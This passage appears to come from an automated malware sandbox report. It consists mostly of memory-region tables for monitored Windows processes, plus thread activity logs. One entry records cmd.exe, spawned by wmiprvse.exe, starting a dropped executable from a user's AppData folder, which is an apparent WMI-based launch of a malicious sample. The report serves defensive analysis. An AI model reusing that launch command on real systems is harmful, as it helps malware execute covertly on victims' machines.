| private_0x000000de9c980000 | 0xde9c980000 | 0xde9c9fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9ca00000 | 0xde9ca00000 | 0xde9ca7ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9cb00000 | 0xde9cb00000 | 0xde9cbfffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9cc00000 | 0xde9cc00000 | 0xde9ccfffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9cd00000 | 0xde9cd00000 | 0xde9cdfffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9ce00000 | 0xde9ce00000 | 0xde9cefffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9d100000 | 0xde9d100000 | 0xde9d1fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9d200000 | 0xde9d200000 | 0xde9d2fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9d300000 | 0xde9d300000 | 0xde9d3fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9d400000 | 0xde9d400000 | 0xde9d4fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9d500000 | 0xde9d500000 | 0xde9d5fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9d600000 | 0xde9d600000 | 0xde9d6fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9d700000 | 0xde9d700000 | 0xde9d7fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9d900000 | 0xde9d900000 | 0xde9d9fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9da00000 | 0xde9da00000 | 0xde9dafffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9dc00000 | 0xde9dc00000 | 0xde9dcfffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000de9de00000 | 0xde9de00000 | 0xde9de7ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000002d8abe20000 | 0x2d8abe20000 | 0x2d8abe2ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000002d8abe30000 | 0x2d8abe30000 | 0x2d8abe31fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000002d8abe40000 | 0x2d8abe40000 | 0x2d8abe54fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000002d8abe60000 | 0x2d8abe60000 | 0x2d8abe63fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000002d8abe70000 | 0x2d8abe70000 | 0x2d8abe70fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000002d8abe80000 | 0x2d8abe80000 | 0x2d8abe81fff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x2d8abe90000 | 0x2d8abf4dfff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x000002d8abf50000 | 0x2d8abf50000 | 0x2d8abf50fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x000002d8abf60000 | 0x2d8abf60000 | 0x2d8abf60fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000002d8abf70000 | 0x2d8abf70000 | 0x2d8abf70fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000002d8abf80000 | 0x2d8abf80000 | 0x2d8abf86fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000002d8abf90000 | 0x2d8abf90000 | 0x2d8abf90fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000002d8abfa0000 | 0x2d8abfa0000 | 0x2d8abfa0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000002d8abfb0000 | 0x2d8abfb0000 | 0x2d8abfb1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000002d8abfc0000 | 0x2d8abfc0000 | 0x2d8abfc0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000002d8abfd0000 | 0x2d8abfd0000 | 0x2d8abfd0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x000002d8abfe0000 | 0x2d8abfe0000 | 0x2d8abfe6fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000002d8abff0000 | 0x2d8abff0000 | 0x2d8abff1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| cversions.2.db | 0x2d8ac000000 | 0x2d8ac003fff | Memory Mapped File | Readable |
|
|
|
- |
| cversions.2.db | 0x2d8ac010000 | 0x2d8ac013fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x000002d8ac020000 | 0x2d8ac020000 | 0x2d8ac026fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000002d8ac030000 | 0x2d8ac030000 | 0x2d8ac0effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000002d8ac0f0000 | 0x2d8ac0f0000 | 0x2d8ac0f1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000002d8ac100000 | 0x2d8ac100000 | 0x2d8ac1fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000002d8ac200000 | 0x2d8ac200000 | 0x2d8ac2fffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000002d8ac300000 | 0x2d8ac300000 | 0x2d8ac487fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000002d8ac490000 | 0x2d8ac490000 | 0x2d8ac610fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000002d8ac620000 | 0x2d8ac620000 | 0x2d8aca1afff | Pagefile Backed Memory | Readable |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db | 0x2d8aca20000 | 0x2d8aca64fff | Memory Mapped File | Readable |
|
|
|
- |
| activeds.dll.mui | 0x2d8aca70000 | 0x2d8aca71fff | Memory Mapped File | Readable |
|
|
|
- |
| winnlsres.dll | 0x2d8aca80000 | 0x2d8aca84fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x000002d8aca90000 | 0x2d8aca90000 | 0x2d8aca96fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000002d8acaa0000 | 0x2d8acaa0000 | 0x2d8acaa1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000002d8acab0000 | 0x2d8acab0000 | 0x2d8acab6fff | Private Memory | Readable, Writable |
|
|
|
- |
| newdev.dll.mui | 0x2d8acac0000 | 0x2d8acac6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x000002d8acad0000 | 0x2d8acad0000 | 0x2d8acad0fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000002d8acae0000 | 0x2d8acae0000 | 0x2d8acae0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x000002d8acaf0000 | 0x2d8acaf0000 | 0x2d8acaf6fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000002d8acb00000 | 0x2d8acb00000 | 0x2d8acbfffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000002d8acc00000 | 0x2d8acc00000 | 0x2d8accfffff | Private Memory | Readable, Writable |
|
|
|
- |
| sortdefault.nls | 0x2d8acd00000 | 0x2d8ad036fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x000002d8ad040000 | 0x2d8ad040000 | 0x2d8ad13ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000002d8ad140000 | 0x2d8ad140000 | 0x2d8ad182fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000002d8ad190000 | 0x2d8ad190000 | 0x2d8ad193fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000002d8ad1a0000 | 0x2d8ad1a0000 | 0x2d8ad1a6fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000002d8ad1b0000 | 0x2d8ad1b0000 | 0x2d8ad1fdfff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x000002d8ad200000 | 0x2d8ad200000 | 0x2d8ad2fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000002d8ad300000 | 0x2d8ad300000 | 0x2d8ad3fffff | Private Memory | Readable, Writable |
|
|
|
- |
| kernelbase.dll.mui | 0x2d8ad400000 | 0x2d8ad4dffff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x000002d8ad4e0000 | 0x2d8ad4e0000 | 0x2d8ad4effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000002d8ad4f0000 | 0x2d8ad4f0000 | 0x2d8ad4fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000002d8ad500000 | 0x2d8ad500000 | 0x2d8ad5fffff | Private Memory | Readable, Writable |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db | 0x2d8ad600000 | 0x2d8ad68dfff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x000002d8ad690000 | 0x2d8ad690000 | 0x2d8ad78ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000002d8ad790000 | 0x2d8ad790000 | 0x2d8ad79ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000002d8ad7a0000 | 0x2d8ad7a0000 | 0x2d8ad7affff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000002d8ad7b0000 | 0x2d8ad7b0000 | 0x2d8ad7bffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000002d8ad7c0000 | 0x2d8ad7c0000 | 0x2d8ad7cffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000002d8ad7d0000 | 0x2d8ad7d0000 | 0x2d8ad7dffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000002d8ad7e0000 | 0x2d8ad7e0000 | 0x2d8ad7effff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x000002d8ad7f0000 | 0x2d8ad7f0000 | 0x2d8ad7f0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000002d8ad800000 | 0x2d8ad800000 | 0x2d8ad806fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000002d8ad810000 | 0x2d8ad810000 | 0x2d8ad85dfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000002d8ad860000 | 0x2d8ad860000 | 0x2d8ad860fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000002d8ad870000 | 0x2d8ad870000 | 0x2d8ad873fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000002d8ad880000 | 0x2d8ad880000 | 0x2d8ad886fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000002d8ad890000 | 0x2d8ad890000 | 0x2d8ad89ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000002d8ad8a0000 | 0x2d8ad8a0000 | 0x2d8ad8affff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000002d8ad8b0000 | 0x2d8ad8b0000 | 0x2d8ad8bffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000002d8ad8c0000 | 0x2d8ad8c0000 | 0x2d8ad8cffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000002d8ad8d0000 | 0x2d8ad8d0000 | 0x2d8ad8dffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000002d8ad8e0000 | 0x2d8ad8e0000 | 0x2d8ad8effff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x000002d8ad8f0000 | 0x2d8ad8f0000 | 0x2d8ad8f1fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000002d8ad900000 | 0x2d8ad900000 | 0x2d8ad9fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000002d8ada00000 | 0x2d8ada00000 | 0x2d8adafffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000002d8adb00000 | 0x2d8adb00000 | 0x2d8adbfffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000002d8adc00000 | 0x2d8adc00000 | 0x2d8adcfffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000002d8add00000 | 0x2d8add00000 | 0x2d8addfffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000002d8ade00000 | 0x2d8ade00000 | 0x2d8adefffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000002d8adf00000 | 0x2d8adf00000 | 0x2d8aeefffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000002d8aef00000 | 0x2d8aef00000 | 0x2d8aef00fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000002d8aef10000 | 0x2d8aef10000 | 0x2d8aef2ffff | Private Memory | Readable, Writable |
|
|
|
- |
|
For performance reasons, the remaining 423 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Process #18: wmiprvse.exe
0
0
| Information | Value |
|---|---|
| ID | #18 |
| File Name | c:\windows\system32\wbem\wmiprvse.exe |
| Command Line | C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:56, Reason: RPC Server |
| Unmonitor | End Time: 00:03:23, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:27 |
| Remarks | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc50 |
| Parent PID | 0x248 (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\Network Service |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C48
0x
C44
0x
688
0x
A1C
0x
A54
0x
C64
0x
708
0x
704
0x
6EC
0x
710
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000f88a400000 | 0xf88a400000 | 0xf88a5fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000f88a600000 | 0xf88a600000 | 0xf88a67ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000f88a680000 | 0xf88a680000 | 0xf88a6fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000f88a700000 | 0xf88a700000 | 0xf88a77ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000f88a780000 | 0xf88a780000 | 0xf88a7fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000f88a800000 | 0xf88a800000 | 0xf88a87ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000f88a880000 | 0xf88a880000 | 0xf88a8fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000f88a900000 | 0xf88a900000 | 0xf88a97ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000f88a980000 | 0xf88a980000 | 0xf88a9fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000f88aa00000 | 0xf88aa00000 | 0xf88aa7ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000002883af80000 | 0x2883af80000 | 0x2883af9ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000002883af80000 | 0x2883af80000 | 0x2883af8ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x000002883af90000 | 0x2883af90000 | 0x2883af96fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000002883afa0000 | 0x2883afa0000 | 0x2883afb4fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000002883afc0000 | 0x2883afc0000 | 0x2883afc3fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000002883afd0000 | 0x2883afd0000 | 0x2883afd0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000002883afe0000 | 0x2883afe0000 | 0x2883afe1fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000002883aff0000 | 0x2883aff0000 | 0x2883aff6fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000002883b000000 | 0x2883b000000 | 0x2883b000fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000002883b010000 | 0x2883b010000 | 0x2883b010fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000002883b020000 | 0x2883b020000 | 0x2883b021fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000002883b030000 | 0x2883b030000 | 0x2883b030fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000002883b040000 | 0x2883b040000 | 0x2883b040fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000002883b050000 | 0x2883b050000 | 0x2883b050fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000002883b060000 | 0x2883b060000 | 0x2883b060fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000002883b070000 | 0x2883b070000 | 0x2883b071fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x000002883b0a0000 | 0x2883b0a0000 | 0x2883b19ffff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x2883b1a0000 | 0x2883b25dfff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x000002883b260000 | 0x2883b260000 | 0x2883b3e7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000002883b440000 | 0x2883b440000 | 0x2883b44ffff | Private Memory | Readable, Writable |
|
|
|
- |
| sortdefault.nls | 0x2883b450000 | 0x2883b786fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x000002883b790000 | 0x2883b790000 | 0x2883b910fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000002883b920000 | 0x2883b920000 | 0x2883b9dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000002883b9e0000 | 0x2883b9e0000 | 0x2883ba6bfff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000002883ba70000 | 0x2883ba70000 | 0x2883bb6ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00007df5ff360000 | 0x7df5ff360000 | 0x7ff5ff35ffff | Pagefile Backed Memory | - |
|
|
|
- |
| pagefile_0x00007ff738600000 | 0x7ff738600000 | 0x7ff7386fffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00007ff738700000 | 0x7ff738700000 | 0x7ff738722fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| wmiprvse.exe | 0x7ff738a80000 | 0x7ff738afffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cimwin32.dll | 0x7ff990570000 | 0x7ff99073efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| framedynos.dll | 0x7ff9908e0000 | 0x7ff99092dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ncobjapi.dll | 0x7ff998aa0000 | 0x7ff998ab5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wmiutils.dll | 0x7ff998f00000 | 0x7ff998f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wbemsvc.dll | 0x7ff998f30000 | 0x7ff998f43fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| fastprox.dll | 0x7ff998f50000 | 0x7ff999045fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wbemprox.dll | 0x7ff999b70000 | 0x7ff999b80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wbemcomn.dll | 0x7ff99b440000 | 0x7ff99b4befff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| userenv.dll | 0x7ff9a7980000 | 0x7ff9a799efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x7ff9a7ea0000 | 0x7ff9a7eccfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| bcrypt.dll | 0x7ff9a8150000 | 0x7ff9a8178fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| profapi.dll | 0x7ff9a8220000 | 0x7ff9a8233fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel.appcore.dll | 0x7ff9a8250000 | 0x7ff9a825efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| powrprof.dll | 0x7ff9a8260000 | 0x7ff9a82aafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| bcryptprimitives.dll | 0x7ff9a82b0000 | 0x7ff9a8319fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x7ff9a8320000 | 0x7ff9a8507fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x7ff9a9000000 | 0x7ff9a905afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x7ff9a9070000 | 0x7ff9a91f5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x7ff9a9200000 | 0x7ff9a931bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x7ff9a9320000 | 0x7ff9a93bcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x7ff9a93c0000 | 0x7ff9a942afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x7ff9a9430000 | 0x7ff9a94f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x7ff9a9500000 | 0x7ff9a9655fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| clbcatq.dll | 0x7ff9a9aa0000 | 0x7ff9a9b46fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x7ff9ab6b0000 | 0x7ff9ab75cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x7ff9ab870000 | 0x7ff9ab916fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| combase.dll | 0x7ff9ab920000 | 0x7ff9abb9cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x7ff9abc00000 | 0x7ff9abdc0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
Process #19: cmd.exe
52
0
| Information | Value |
|---|---|
| ID | #19 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | cmd /c start C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:57, Reason: Child Process |
| Unmonitor | End Time: 00:03:23, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:26 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x6fc |
| Parent PID | 0xc50 (c:\windows\system32\wbem\wmiprvse.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | X2VS1CUM\Nd9E1FYi |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
700
0x
CEC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x0000009b58e00000 | 0x9b58e00000 | 0x9b58ffffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000009b59000000 | 0x9b59000000 | 0x9b590fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000009b59100000 | 0x9b59100000 | 0x9b591fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000027890d50000 | 0x27890d50000 | 0x27890d6ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000027890d50000 | 0x27890d50000 | 0x27890d5ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000027890d60000 | 0x27890d60000 | 0x27890d66fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000027890d70000 | 0x27890d70000 | 0x27890d84fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000027890d90000 | 0x27890d90000 | 0x27890d93fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000027890da0000 | 0x27890da0000 | 0x27890da0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000027890db0000 | 0x27890db0000 | 0x27890db1fff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x27890dc0000 | 0x27890e7dfff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000027890e80000 | 0x27890e80000 | 0x27890e86fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000027890f30000 | 0x27890f30000 | 0x27890f3ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000027890f40000 | 0x27890f40000 | 0x2789103ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00007df5ffc50000 | 0x7df5ffc50000 | 0x7ff5ffc4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| pagefile_0x00007ff7e5e10000 | 0x7ff7e5e10000 | 0x7ff7e5f0ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00007ff7e5f10000 | 0x7ff7e5f10000 | 0x7ff7e5f32fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| cmd.exe | 0x7ff7e6a00000 | 0x7ff7e6a59fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x7ff9a8320000 | 0x7ff9a8507fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x7ff9a9320000 | 0x7ff9a93bcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x7ff9ab6b0000 | 0x7ff9ab75cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x7ff9abc00000 | 0x7ff9abdc0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
Threads
Thread 0x700
52
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\system32\cmd.exe, base_address = 0x7ff7e6a00000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x7ff9ab6b0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x7ff9ab6d3270 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
3 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
2 | |
| Environment | Get Environment String | - |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
